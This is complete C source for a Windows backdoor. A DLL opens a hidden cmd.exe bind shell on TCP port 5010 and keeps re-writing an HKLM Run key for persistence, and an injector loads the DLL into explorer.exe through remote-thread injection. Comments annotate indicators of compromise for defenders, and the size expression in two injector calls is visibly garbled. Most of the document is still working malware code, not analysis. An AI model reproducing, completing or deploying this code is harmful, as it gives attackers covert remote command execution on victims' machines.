#include "stdafx.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32")
// TCP port the in-process listener binds (see ControlThread). On a host,
// an unexpected listener on 5010 owned by a process that normally has
// no network service is the first thing to look for.
#define PORT 5010
// HKLM autostart key. WriteReg keeps re-creating a value under it, so this
// path plus the value name it uses is the persistence indicator.
#define REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
// Per-session state handed to RecvThread / SendThread by BDoor: the
// accepted client socket and one end of a pipe attached to the spawned
// cmd.exe. Instances live on BDoor's stack; the workers copy them on entry.
struct THREADPARAM
{
    SOCKET sock;   // accepted client socket
    HANDLE handle; // pipe end: cmd.exe stdin writer (RecvThread) or stdout reader (SendThread)
};
// Listener thread started from DllMain; accepts clients on PORT.
DWORD WINAPI ControlThread(void *no);
// One shell session per accepted client (cmd.exe behind a socket).
DWORD WINAPI BDoor(void *lp);
// Socket -> cmd.exe stdin.
DWORD WINAPI RecvThread(void *lp);
// cmd.exe stdout/stderr -> socket.
DWORD WINAPI SendThread(void *lp);
// Persistence: periodically rewrites the Run-key value.
DWORD WINAPI WriteReg(void *no);
// DLL entry point of the backdoor module. Its only work is to start
// ControlThread when the DLL is loaded into a process (the injector's
// WinMain later in this listing targets explorer.exe); nothing is torn
// down on detach. The thread is created while the loader lock is held,
// so it does not get going until this DllMain has returned.
BOOL APIENTRY DllMain( HANDLE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
    )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        // Listener + persistence; runs for the lifetime of the host process.
        ::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
        break;
    }
    case DLL_PROCESS_DETACH:
    {
        break;
    }
    }
    return TRUE;
}
// Main backdoor thread: starts the persistence thread, then accepts TCP
// clients on PORT and hands each one to a BDoor shell session.
//
// What a defender sees: a socket listening on 0.0.0.0:5010 inside whatever
// process this DLL was loaded into, plus the registry activity described
// at WriteReg. The return type is DWORD, so the -1 paths show up as
// 0xFFFFFFFF in the thread exit code.
DWORD WINAPI ControlThread(void *no)
{
    // Persistence runs independently of the listener.
    CreateThread(NULL,0,WriteReg,NULL,0,NULL);
    WSADATA wsaData;
    SOCKET listenSock;
    if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
    {
        return -1;
    }
    if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        return -1;
    }
    sockaddr_in localAddr,inAddr;
    int addrLen=sizeof(inAddr);
    // S_addr == 0 is INADDR_ANY: bound on every interface, not only loopback.
    localAddr.sin_addr.S_un.S_addr=0;
    localAddr.sin_family=AF_INET;
    localAddr.sin_port=htons(PORT);
    if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))
    ==SOCKET_ERROR)
    {
        closesocket(listenSock);
        return -1;
    }
    listen(listenSock,5);
    while(TRUE)
    {
        // One BDoor thread per client. The thread receives the address of
        // this loop-local SOCKET; the Sleep is presumably meant to let it
        // copy the value before the next accept() overwrites it (no
        // synchronisation guarantees that). The accept() result is not
        // checked against INVALID_SOCKET before being handed over.
        SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen);
        DWORD ID;
        CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
        Sleep(100);
    }
    // Unreachable: the accept loop above has no exit condition.
    closesocket(listenSock);
    ::WSACleanup();
}
// Persistence thread. Builds "<system directory>\DllInjection.exe" and,
// every 5 seconds for the life of the host process, (re)writes it as the
// REG_SZ value "sysDll" under HKLM\...\Run. Deleting the value while the
// host process is alive therefore only lasts until the next pass.
//
// Indicators: a Run value named "sysDll" whose data points into the system
// directory, and a registry write to that key recurring on a 5 s cadence
// from the host process. The data is written with len == strlen(sysPath),
// i.e. without the terminating NUL.
DWORD WINAPI WriteReg(void *no)
{
    char sysPath[MAX_PATH]={0};
    int ret=::GetSystemDirectory(sysPath,MAX_PATH);
    // Make sure exactly one separator precedes the file name.
    if(sysPath[ret-1]!='\\')
        strcat(sysPath,"\\");
    strcat(sysPath,"DllInjection.exe");
    int len=strlen(sysPath);
    while(TRUE)
    {
        HKEY hKey;
        // Open failure (e.g. insufficient rights) is retried at once;
        // the Sleep below is only reached after a successful write.
        if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS)
            continue;
        ::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);
        ::RegCloseKey(hKey);
        Sleep(5000);
    }
    return 0;
}
// One interactive shell session per connected client.
//
// Creates an inheritable pipe pair, starts a hidden cmd.exe with stdin
// on hCmdIn and stdout/stderr on hCmdOut, then runs RecvThread
// (socket -> hWrite -> cmd stdin) and SendThread (cmd stdout -> hRead ->
// socket) until the client disconnects or sends "exit". On the way out
// SendThread and cmd.exe are terminated and the socket is closed.
//
// Indicators: a cmd.exe child of the host process started with
// STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW and SW_HIDE, whose standard
// handles are pipes rather than a console, and whose parent holds a
// socket on PORT.
//
// lp points at ControlThread's stack-local SOCKET; it is copied on the
// first line.
DWORD WINAPI BDoor(void *lp)
{
    SOCKET sock=*((SOCKET *)lp);
    HANDLE hCmdOut,hCmdIn,hRead,hWrite;
    SECURITY_ATTRIBUTES sec={0};
    sec.nLength=sizeof(sec);
    sec.lpSecurityDescriptor=NULL;
    // Every pipe end is inheritable, so cmd.exe also inherits this side
    // of each pipe, not only the two it is given as std handles.
    sec.bInheritHandle=TRUE;
    // hCmdIn = read end (cmd's stdin); hWrite = our write end.
    CreatePipe(&hCmdIn,&hWrite,&sec,0);
    // hRead = our read end; hCmdOut = write end (cmd's stdout/stderr).
    CreatePipe(&hRead,&hCmdOut,&sec,0);
    char cmdDir[MAX_PATH]={0};
    ::GetSystemDirectory(cmdDir,MAX_PATH);
    if(cmdDir[strlen(cmdDir)-1]!='\\')
        strcat(cmdDir,"\\");
    strcat(cmdDir,"cmd.exe");
    STARTUPINFO startUpInfo={0};
    startUpInfo.cb=sizeof(startUpInfo);
    startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    startUpInfo.wShowWindow=SW_HIDE;
    startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
    startUpInfo.hStdInput=hCmdIn;
    PROCESS_INFORMATION processInfo={0};
    // bInheritHandles = TRUE is what lets the pipe ends reach the child.
    int ret=CreateProcess
    (cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
    if(ret==0)
    {
        // Pipe handles and the socket stay open on this path.
        return -1;
    }
    // The child has its own copies of its std handles; drop ours.
    CloseHandle(hCmdIn);
    CloseHandle(hCmdOut);
    DWORD ID1,ID2;
    HANDLE hRecvThread,hSendThread;
    // Both parameter structs live in this frame and are read by the worker
    // threads through the pointers passed to CreateThread; the frame stays
    // alive until after both workers are done because of the wait below.
    THREADPARAM recvParam={0},sendParam={0};
    recvParam.sock=sock;
    recvParam.handle=hWrite;
    hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);
    sendParam.sock=sock;
    sendParam.handle=hRead;
    hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);
    ULONG code;
    // The session ends when RecvThread returns (disconnect or "exit").
    ::WaitForSingleObject(hRecvThread,INFINITE);
    // SendThread never leaves its loop on its own, so it is killed; `code`
    // is just its current status reused as the termination code, and the
    // same is done for cmd.exe.
    ::GetExitCodeThread(hSendThread,&code);
    ::TerminateThread(hSendThread,code);
    ::GetExitCodeProcess(processInfo.hProcess,&code);
    ::TerminateProcess(processInfo.hProcess,code);
    closesocket(sock);
    CloseHandle(hWrite);
    CloseHandle(hRead);
    // hRecvThread, hSendThread and the processInfo handles are not closed.
    return 0;
}
// Socket -> cmd.exe stdin. Reads the client one byte at a time, echoes
// each byte back, and accumulates a line in `cmd`; on '\n' the line is
// either the session terminator ("exit\r\n", compared case-insensitively)
// or is written verbatim to the pipe feeding cmd.exe.
//
// Exit conditions: recv() returning 0 (orderly disconnect) or the exit
// command. A recv() error matches neither branch, so the loop just calls
// recv() again. `cmd` grows by strcat and is never checked against its
// 256-byte size.
DWORD WINAPI RecvThread(void *lp)
{
    char cmd[256]={0};
    // Copy out of BDoor's stack frame.
    THREADPARAM param=*((THREADPARAM *)lp);
    while(1)
    {
        // Two bytes so temp stays NUL-terminated for strcat.
        char temp[2]={0};
        int ret=recv(param.sock,temp,1,0);
        if(ret==0)
        {
            break;
        }
        else if(ret==1)
        {
            // Echo so the remote side sees what it typed.
            send(param.sock,temp,1,0);
            strcat(cmd,temp);
            if(temp[0]=='\n')
            {
                if(_stricmp(cmd,"exit\r\n")==0)
                {
                    break;
                }
                ULONG len;
                // Hand the complete line (CR/LF included) to cmd.exe.
                ::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
                memset(cmd,0,256);
            }
        }
    }
    return 0;
}
// cmd.exe stdout/stderr -> socket. Every 100 ms PeekNamedPipe checks for
// pending output; when there is some, up to 1024 bytes are read and sent
// to the client. The loop has no exit condition of its own: BDoor ends it
// with TerminateThread once the receive side finishes.
DWORD WINAPI SendThread(void *lp)
{
    // Copy out of BDoor's stack frame.
    THREADPARAM param=*((THREADPARAM *)lp);
    char buf[1024]={0};
    while(1)
    {
        ULONG len=0;
        // `len` first holds the number of bytes peeked (data stays in the
        // pipe), then the number actually consumed by ReadFile.
        ::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
        if(len>0)
        {
            ::ReadFile(param.handle,buf,1024,&len,NULL);
            send(param.sock,buf,len,0);
            memset(buf,0,1024);
        }
        Sleep(100);
    }
    return 0;
}
// Dll.cpp
#include "stdafx.h"
#include "windows.h"
#include "stdlib.h"
#include "tlhelp32.h"
#include "io.h"
// Defined below: PID of the first running process whose executable base
// name (no directory, no extension) equals processName case-insensitively,
// or -1 when the snapshot fails or nothing matches.
long GetProcessID(char *processName);
// Injector. After a 5 s delay it locates explorer, opens it with
// PROCESS_ALL_ACCESS, writes the path "<system directory>\BDoor.dll" into
// its address space and starts a remote thread whose entry point is
// LoadLibraryA and whose argument is that path, so explorer loads the
// backdoor DLL above. The LoadLibraryA address resolved in this process
// is assumed to be valid in the target as well (kernel32 at the same
// base); the code does not check this.
//
// Indicators: OpenProcess(PROCESS_ALL_ACCESS) on explorer followed by the
// VirtualAllocEx / WriteProcessMemory / CreateRemoteThread sequence, from
// a process named DllInjection.exe (the name WriteReg registers for
// autostart), and explorer gaining a BDoor.dll module loaded from the
// system directory. Every failure path returns -1 and releases nothing.
int APIENTRY WinMain(HINSTANCE hInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpCmdLine,
    int nCmdShow)
{
    // TODO: Place code here.
    // Presumably gives the desktop time to come up after the Run-key launch.
    Sleep(5000);
    long ID=GetProcessID("explorer");
    if(ID==-1)
        return -1;
    HINSTANCE hDll;
    HINSTANCE (* pProc)(LPCTSTR);
    DWORD (WINAPI * pThreadProc)(void *);
    if((hDll=::LoadLibrary("kernel32.dll"))==NULL)
        return -1;
    if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))
    ==NULL)
        return -1;
    // LoadLibraryA(LPCSTR) reinterpreted as a thread start routine.
    pThreadProc=(DWORD (WINAPI *)(void *))pProc;
    HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);
    if(hProcess==NULL)
        return -1;
    char pDllPath[MAX_PATH]={0};
    char *pRemoteAddr=NULL;
    int ret=::GetSystemDirectory(pDllPath,MAX_PATH);
    if(pDllPath[ret-1]!='\\')
        strcat(pDllPath,"\\");
    strcat(pDllPath,"BDoor.dll");
    // Give up if the DLL is not present on disk.
    if(::_access(pDllPath,0)==-1)
        return -1;
    // NOTE(review): the size expression "strlen(pDllPath) 1" here and in
    // the VirtualFreeEx call below has lost its operator in this copy of
    // the listing.
    pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)
    1,MEM_COMMIT,PAGE_READWRITE);
    if(pRemoteAddr==NULL)
        return -1;
    // The path is written without its terminating NUL.
    ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen
    (pDllPath),NULL);
    if(ret==0)
        return -1;
    HANDLE hRemoteThread=::CreateRemoteThread
    (hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);
    // Sleeps a fixed 100 ms (does not wait on hRemoteThread), then
    // decommits the remote buffer; hRemoteThread is never closed.
    Sleep(100);
    ::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath) 1,MEM_DECOMMIT);
    ::CloseHandle(hProcess);
    return 0;
}
// Return the PID of the first running process whose executable base name
// (directory and extension stripped by _splitpath) equals processName
// case-insensitively; -1 if the snapshot cannot be taken, has no first
// entry, or nothing matches. The snapshot handle is not released on any
// path.
long GetProcessID(char *processName)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snap == NULL)
        return -1;
    PROCESSENTRY32 entry = {0};
    entry.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(snap, &entry))
        return -1;
    char drive[_MAX_DRIVE] = {0};
    char dir[_MAX_DIR] = {0};
    char base[_MAX_FNAME] = {0};
    char ext[_MAX_EXT] = {0};
    for (;;)
    {
        // Compare on the file-name component only, so "explorer" matches
        // "explorer.exe" wherever it lives.
        _splitpath(entry.szExeFile, drive, dir, base, ext);
        if (_stricmp(processName, base) == 0)
            return entry.th32ProcessID;
        if (!Process32Next(snap, &entry))
            return -1;
    }
}